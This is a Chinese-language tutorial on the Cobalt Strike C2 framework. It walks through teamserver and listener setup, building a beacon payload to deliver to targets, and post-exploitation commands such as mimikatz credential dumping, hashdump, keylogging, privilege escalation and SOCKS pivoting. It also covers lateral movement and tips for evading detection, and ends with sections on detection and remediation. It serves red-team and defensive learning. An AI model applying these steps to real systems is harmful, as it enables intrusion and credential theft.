写在前面:合法学习边界
Cobalt Strike 是商用红队工具,仅用于授权测试或授权渗透项目。未经授权使用、上线真实系统可能触犯法律。
一、工具定位
Cobalt Strike(CS)是红队常用的 C2 框架,核心组件:
1
2
3
4
| Teamserver:服务端,管理团队与 Beacon
Client:攻击者操作界面
Listener:监听反向连接
Beacon:植入目标主机的后门会话
|
它的价值不只是“反弹 Shell”,而是团队协作 + 后渗透 + 横向的一体化平台。
二、启动与配置
启动 Teamserver
1
2
| # 用法:teamserver <监听IP> <密码> [c2profile]
./teamserver 192.168.1.100 YourPassword
|
连接 Client
1
2
| 打开 Cobalt Strike → Connect
输入 teamserver IP、密码
|
新建 Listener(监听器)
1
2
3
| Listeners → Add
Type 选 windows/beacon_https(加密回流,比 http 稳)
设置 Host 为攻击机 IP、端口(如 443/8443)
|
三、生成 Payload 并上线
生成 Beacon
1
2
3
| Attacks → Packages → Windows Executable
选 Listener,生成 exe
把 exe 投递到目标执行(钓鱼/漏洞利用后)
|
上线确认
1
| 目标执行后,Cobalt Strike 的会话列表出现 Beacon
|
四、Beacon 常用命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| shell whoami # 执行系统命令
shell ipconfig /all
upload /path/x.exe # 上传文件
download C:\x.txt # 下载文件
screenshot # 截屏
ps # 进程列表
migrate <pid> # 进程注入迁移(稳会话)
getsystem # 提权到 SYSTEM
hashdump # 抓本地哈希
mimikatz sekurlsa::logonpasswords # 抓凭据
keylogger # 键盘记录
sleep 60 # 回连间隔
browserpivot # 浏览器劫持
socks 1080 # 开 Socks 代理
spawn # 派生新会话
|
五、横向与隧道
横向移动
1
2
3
| 用 beacon 的 psexec_psh / wmi 模块
目标:已抓到的哈希/账号横向登录其他主机
配合 mimikatz hashdump + psexec_psh
|
Socks 代理
1
2
| beacon> socks 1080
本地 proxychains 指到 CS 客户端 → 访问内网
|
影响与风险
C2 一旦上线目标,攻击者能做的事远不止弹个 Shell:
1
2
3
| 长期驻留、随时远程控制
抓取凭据、横向移动整个内网
数据窃取、勒索、持久后门
|
风险等级:严重。CS 这类平台化工具放大了单点失陷的影响面。
六、特征与规避(务必注意)
1
2
3
4
| 默认 Beacon 特征明显:固定端口、固定 User-Agent、默认流量指纹
安全产品能识别默认 CS → 需改 C2 Profile 隐藏特征
上线频率(sleep)、进程迁移、内存中运行可降低落地风险
免杀与规避是独立课题,授权内使用
|
七、检测(对立面)
1
2
3
4
| 特征域名/固定回连流量
Beacon 内存特征、异常进程注入
抓包识别 C2 协议指纹
EDR 检测 CS 常用手法(mimikatz、hashdump、进程注入)
|
修复
1
2
3
4
5
| 清除失陷主机上的 Beacon 进程与持久化
排查计划任务/服务/注册表中的自启
加固出站策略,阻断 C2 回连
EDR 检测进程注入、mimikatz 等手法
修复后复测:无外联、无异常进程
|
八、小结
Cobalt Strike 的流程是:teamserver → listener → payload 上线 → beacon 后渗透 → 横向。它把红队工作“平台化”,但也因此特征明显——攻防双方都在研究它的指纹。授权使用、注意特征,是两件必须同时做的事。